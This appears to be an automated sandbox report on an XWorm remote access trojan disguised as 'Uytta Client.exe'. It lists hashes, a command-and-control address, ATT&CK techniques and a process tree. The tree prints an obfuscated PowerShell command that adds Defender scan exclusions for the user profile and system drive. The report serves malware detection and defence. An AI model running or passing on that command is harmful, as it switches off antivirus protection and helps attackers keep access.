xworm | d44cd1efe9953098482be69488f24bf35c2e3662e2cc843a49b928a972eeb8a8

Analysis

max time kernel
118s
max time network
131s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
03/03/2025, 00:33

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Uytta Client.exe
Size

284KB
MD5

3877eb59a133bcf9745356dc794d48b9
SHA1

632f1d6ae66e5572e857cf41795b02137b1afe2e
SHA256

d44cd1efe9953098482be69488f24bf35c2e3662e2cc843a49b928a972eeb8a8
SHA512

886a3b50a01c57fb277f3fa295070195621c45c74f7d391c2507ccd4d33800ae08717f70704c79557cf880af85f242670c30cc6ee74491f329180feb264548cf
SSDEEP

3072:8siYcW3RruM0pV5nFPi0ffWZgOelgIiuM/5CxgsDnUi/H+VvtCY4InH3H8:8/Yc+B4540ffW/elQ5Ce9O+VvPNM

Score

10^/10

xworm defense_evasion discovery rat trojan

Malware Config

Extracted

Family

xworm

173.31.160.10:4040

Attributes

Install_directory
%AppData%
install_file
USB.exe

Signatures

Detect Xworm Payload 2 IoCs

resource	yara_rule
behavioral1/files/0x000c000000012281-2.dat	family_xworm
behavioral1/memory/1044-15-0x00000000009F0000-0x0000000000A06000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Executes dropped EXE 2 IoCs

pid	Process
1044	XClient.exe
2372	MonkeModManager.exe

Loads dropped DLL 3 IoCs

pid	Process
2340	Uytta Client.exe
2340	Uytta Client.exe
2340	Uytta Client.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
5	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Uytta Client.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE

Modifies Internet Explorer settings 1 TTPs 36 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "447123880"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000352c90902f1a82469880e9935713957b000000000200000000001066000000010000200000003c3e856def5708a8789b2f0398b9ed6df06859349438ad596a497475c218965f000000000e8000000002000020000000d9fb861227c658308e4bc8bc632a31bbf38e9fbf9ab8e7b94fbf5af82052dce2200000004cae008ce1be1dab6e47eafcc0f6b8d154706f4238f611493e69d1b6536bc4604000000049d273b2b53af5a438cdd0ca87af210377e692c2df34278f1073f8c80bbb6f12ccbc90827d2a1ee5c1499b4b4e1d0ab5487b0d8c9226704da58866aad8077427	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{22776001-F7C7-11EF-B729-F2BBDB1F0DCB} = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = a0f733f7d38bdb01	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\SearchScopes	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "2"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000352c90902f1a82469880e9935713957b0000000002000000000010660000000100002000000009e56c25e022230f63742e6f96c25f31dc724d300df8321b136c010b4c8a65a9000000000e80000000020000200000002b344e0b90056e2a27d26623315b5a2f3ab5831da922b458e540c655ce3fa10f900000006851340a0e4b21ee07cd634ea5cce8554d1e1eb88e5b55f755b062db9878d718a19897be12c87457890097671778cd8d497a2430b4611a2c2cbf6b5ce1ca9bde1926bc7cc3e90c759fa32c236080c028d5670d149774019fe38d9ef896ed85087dc1af5c1a5d2063d18f52124614a075568d343f4d55ee88af328569b9808c24df049f6b11cef923d459170bbb6ab5e9400000002ca722e80012d68e74049c47840d23e1ded5b571a33320f3a8764352202b0d1bbbddb0cfa7b91e9e6e21680189aa2ae690fd3c06fcbe64b2c60db3578846b505	iexplore.exe

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
2536	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	1044	XClient.exe
Token: SeDebugPrivilege	2536	powershell.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
2628	iexplore.exe

Suspicious use of SetWindowsHookEx 4 IoCs

pid	Process
2628	iexplore.exe
2628	iexplore.exe
2588	IEXPLORE.EXE
2588	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 16 IoCs

description	pid	Process	procid_target
PID 2340 wrote to memory of 2536	2340	Uytta Client.exe	30
PID 2340 wrote to memory of 2536	2340	Uytta Client.exe	30
PID 2340 wrote to memory of 2536	2340	Uytta Client.exe	30
PID 2340 wrote to memory of 2536	2340	Uytta Client.exe	30
PID 2340 wrote to memory of 1044	2340	Uytta Client.exe	32
PID 2340 wrote to memory of 1044	2340	Uytta Client.exe	32
PID 2340 wrote to memory of 1044	2340	Uytta Client.exe	32
PID 2340 wrote to memory of 1044	2340	Uytta Client.exe	32
PID 2340 wrote to memory of 2372	2340	Uytta Client.exe	33
PID 2340 wrote to memory of 2372	2340	Uytta Client.exe	33
PID 2340 wrote to memory of 2372	2340	Uytta Client.exe	33
PID 2340 wrote to memory of 2372	2340	Uytta Client.exe	33
PID 2628 wrote to memory of 2588	2628	iexplore.exe	36
PID 2628 wrote to memory of 2588	2628	iexplore.exe	36
PID 2628 wrote to memory of 2588	2628	iexplore.exe	36
PID 2628 wrote to memory of 2588	2628	iexplore.exe	36

C:\Users\Admin\AppData\Local\Temp\Uytta Client.exe
"C:\Users\Admin\AppData\Local\Temp\Uytta Client.exe"
1⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2340
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHgAaABpACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAYQBtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAYgBsACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGUAegB6ACMAPgA="
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2536
- C:\Users\Admin\AppData\Local\Temp\XClient.exe
  "C:\Users\Admin\AppData\Local\Temp\XClient.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:1044
- C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe
  "C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe"
  2⤵
  - Executes dropped EXE
  PID:2372

C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\Desktop\NewTrace.mht
1⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2628
- C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
  "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2628 CREDAT:275457 /prefetch:2
  2⤵
  - System Location Discovery: System Language Discovery
  - Modifies Internet Explorer settings
  - Suspicious use of SetWindowsHookEx
  PID:2588

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

Filesize
71KB

MD5
83142242e97b8953c386f988aa694e4a

SHA1
833ed12fc15b356136dcdd27c61a50f59c5c7d50

SHA256
d72761e1a334a754ce8250e3af7ea4bf25301040929fd88cf9e50b4a9197d755

SHA512
bb6da177bd16d163f377d9b4c63f6d535804137887684c113cc2f643ceab4f34338c06b5a29213c23d375e95d22ef417eac928822dfb3688ce9e2de9d5242d10

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
c4ae150ec5ae4cf6bb2d0bb33beeb20d

SHA1
c0e9ccfd4c54389a1dc09c64c97e01125fac161a

SHA256
89e26631b9346a38484f31c5eca6bf5377a4035ece7fdc96c20be8718417cff4

SHA512
eb25c6ccc9231cd66421754311d536c25f91da93557648ca6e8f0bb92a3d377357f484b107d43134715237586b384cd2f7939a4533ec8d74b75f08933c3a715d

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
276e43e5425fea879e9554d03604a3ca

SHA1
588d9869ca478479cfb6135ccbd7144f398ac44d

SHA256
f0087881582440c7b6abd3445d1b2f83f707226ee3a63c79619d88d516663b3b

SHA512
a91c83827cf3ccf6fc63f935b240b4ee261e2a33ef560e0fd7f922e1340169a9788138923258a95dd5db9795fa1544d6c0e1f10f17b8e407c60b63b7462c80e9

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
00ffee7741cff358361f1970c9efc39d

SHA1
83a950a4e7a1d4705f962f668b7631c5f9c6dcff

SHA256
7941a85fb12ff5d954c467dc5fe94201a56f98adf28b2127c4cbe16db1a9176c

SHA512
4cfcb184e98714ac08aee2a2a0119524f0f09e10ddbdf2273053c2deaa962aaac0c061ebb90d4a19de0daa7e61dcffbacdf4784249facdeb84ac381083795c15

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
bd29863d4bb42009bdef17954167fff3

SHA1
5a518a6183c5ef66cea05640bd3868bea4fbd8b2

SHA256
5bb619269a6666bace57d4ab71526c71c66afc48864c96e78dba653123b612cd

SHA512
25263aac7b2c1dfc789a1ce8c1b5d3d485750ca51aef90f2209ef754be5ae56a08860853b3b9c5efbd1561f1d59d5a1059f6689039636e10cc73cd08ee49065a

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
7797f097d5ddc76611fc984aecca0a1a

SHA1
176c3fc311b956de943bc3b43006b3d9a738b1ab

SHA256
cf5dea816a19591ff0fe59a830586c99ccbd222353b5ed9b78f48dd10b06c00a

SHA512
56c73785263eb7f8eae9a579d509e2da5adbfdffe6482182e07fbcb882fd3b1887bf2403c0bf7628ec47e0de682be77539abf52001ceb147183659b1ee83086e

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
d8f032c284c116f3d71f0d9287962b11

SHA1
1c80dcfff2580e33742b00659b90bad5fb1f4ab8

SHA256
9e8705552b3c615c14c21a10ad926384a9f86ff535d76747605e0044b4be7d4e

SHA512
8cf5289eb15ce671438eaf3dc98b8d2bd01dc374cf7f489683ed06bdefcba610dea42f79a59c780da8fadcd7b1639e868b250fe368b6fc99618b521a5abd159c

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
730392d5db89ba20908c24c9baae4b42

SHA1
745c310088cd53803f030f5e6930e5b158194439

SHA256
cb77c64dc077d1772d0b23a7ad7fa2b5678dc3029034b67fdfae727aa4893047

SHA512
0724d0ccc8ac095534317ea346ce36f75061add6e1f6cd08d043bc2c9d05697c9afddce80f9e2bf15ee1ef17ab5a3ad52f603bddb0be27f1452391857d499e07

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
5eddc07fac8e251dfe7684da777bd17c

SHA1
dfaec48d1904314351377e97a0a1bb263491958a

SHA256
63ce665ee4a86136723c1b500b6d2d09bcc752810902444562f052942683406a

SHA512
faf2439e7bfeeabbc9fb81476cbee19ac2707fb2724b0b3401c48c6ef3f45d2c182df7caf82ea5597d156252c27b2d298cb2ccc05be58b09cec4bccf0a2ada43

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
332ca009ca7da0188e3534ed7452f8f5

SHA1
3fda65ea1a8a1be2ee08e1d809dfc4c6a108a042

SHA256
d40b917c46e57440db1fee0caf1d478ebad1c92bbd60428f715d9ea67182db54

SHA512
094b042942ab7c5bc8fd0b9c84a01057c31ced430fe561a508e14c731bf86ea41131515c269faad360e26e7f5f4a8c2db0d2061422a40e66d4e71dcd0bae1250

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
5838b38deb3da4725a4de3f0c0d5d91f

SHA1
a2c567c26623c77c154b61fd563de5a6195a5861

SHA256
f16041cf3d241ffce886044766d26fee110307f0a39539602ae7497940b94eef

SHA512
d86e8dc7c598fa6ccf91454860d225b5d5f0265f879e1e41ca6aa300a56f1f35bae634de4f1235d86e7aee89901385f532968fcdf0525ef40ed4f459f8990992

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
67f5c83e12bbdf5220e35c0fdd60dcab

SHA1
0aaede3af0a25c7b6296f73b35ff95f1d4889255

SHA256
1e378de01961b6478f1af7978f331a5d8b7d3b6528a8b585d59efba60ee76a4c

SHA512
dc81544c487b7f3352bb17ef4f1b0b112e19f58066813b2734e4ac40e59164bd852606dfd78e9b35d0b7dd992cd389acefdd3f83225ad53e0306ee76e054cab1

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
2872340ac673148e72ebab0b7586b37c

SHA1
c58fdb00e8dde426a1ba737fcdc178f66b9dd8f3

SHA256
5a7cc7c38688e96aade8985397837919e64b56e9c8d606d1dd1e142b8648642d

SHA512
71f64536583f6e14f44fbd441e0fe102d842435e76756662e3b676a1603b363ff97303bd7295473d7d114ad0a94d02607a01b736ac52b55b654b6b785a609be1

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
df302c27e6fb6182c15878695b382a99

SHA1
a20e190d70c47fc79c393598ddf13bd544f30335

SHA256
8c66ff446911be4859905a0fb788a0b8c5733f66d6986cb46190875adb813c23

SHA512
7f0a7bc04beba4c7d4cf4ed4ee108b8d94e27ea18b3f62d1dcf338a0bcf3b0d69616a95a0ffd3d65733ff3355d9d7eeea95b155ab9acc3cef14507caa34b7cfb

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
2f0d5efa1a6848a7ccfce7cf6757f4f8

SHA1
0aaed89b73978e55f3b61b88e602ff634c8ea2e0

SHA256
542c2b1a7ab076d6dc4e9882a1e782ec570b7786a0aa1e4dbaa8538fad2b6a27

SHA512
d4203f24372f577b75f42d2a8ac75a9acccb13dbda4be97b4313ccd683c240609728b108ef856100ad242c9080c292f71250b4cb8ec37abe45ee2b87d927679a

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
dabc064e47398b239327744bf58cd4e9

SHA1
a95477070ab2f8d58499a844f0d770b2ca0dacfb

SHA256
532f69eeca8a6f0324af7b57ad7e27fd059d62aef406d1a1e4618ffb2e3c94e9

SHA512
e6febae9a4c86780cca90bc75cce713df97cf714e59bf998aac979e43eae630475741a62613962a7cbb050d25e1f6654b4275ad12fdddc1257aae7871087179f

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
f764cf8012d9956748a513b402418e7c

SHA1
8612f245120138fd8d544a167045f633a8ca69d7

SHA256
5e38779b3e98fbbbd29108c6ffabc6c53ebe58745d26f0f4cb3218ffd797fd9e

SHA512
dba8c3e617edcb993a59cf14d987790cf7ccfd5eb5af9abf0fe641152197a31bccc2859f565619a746e44950f79d8dd3deff5dcc6e1ce756faef97654464ad77

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
7d641aa027c614f767d085bdfda66920

SHA1
b3c53f21e46db81cf8bb8e95793b651a7d2ea086

SHA256
6bb6c0d1e6efc0fb5a5146697426a051ae369e85dd8738ba1a7f7715ed4daf59

SHA512
b7c01b7a9329290d7b03c73ddfe1cdf1a1a52531b09042d0852290b8b92107ff79d2de221287bdd4dcfeed7197d2c2fefd229065e5120c152a67f3b903ba5b0b

Download Submit
C:\Users\Admin\AppData\Local\Temp\CabD56B.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe

Filesize
217KB

MD5
1d62aa3d19462f3d5575fc54159911b4

SHA1
b37eab86c0075245fcc517a280f0705f6dffb852

SHA256
6acaae0fb470790102a338e23dfe2263f31e529288e4efe51b34bca30371cb36

SHA512
78a9501d7920920577a586396e5d9e2278a7c926448c9a98d7844db9032dbd887df90d2f389fe1754bf5a2071a19dfd5d40315624923e903ef9ef6cbb214b1df

Download Submit
C:\Users\Admin\AppData\Local\Temp\TarD68B.tmp

Filesize
183KB

MD5
109cab5505f5e065b63d01361467a83b

SHA1
4ed78955b9272a9ed689b51bf2bf4a86a25e53fc

SHA256
ea6b7f51e85835c09259d9475a7d246c3e764ad67c449673f9dc97172c351673

SHA512
753a6da5d6889dd52f40208e37f2b8c185805ef81148682b269fff5aa84a46d710fe0ebfe05bce625da2e801e1c26745998a41266fa36bf47bc088a224d730cc

Download Submit
\Users\Admin\AppData\Local\Temp\XClient.exe

Filesize
61KB

MD5
67ad539d4ba13679ee8d1d08d2550222

SHA1
84e0e5f4c37f1e7bcae5fd652de76b5d12302733

SHA256
5e5102c1c1bc6f43fcf95b46816e69b37c28189043b100e762670bc81504d5bd

SHA512
c261a58e55d0d2a7dbcd27d45e9a4c39f30ee522bb50179ad0d479a9bdbccbf08d8d08663f08cc579898799f87bdfa1f2cd2ad3dd153e3aaada88c8fc3d5366c

Download Submit
memory/1044-15-0x00000000009F0000-0x0000000000A06000-memory.dmp

Filesize
88KB

Download
memory/2372-16-0x00000000010A0000-0x00000000010DC000-memory.dmp

Filesize
240KB

Download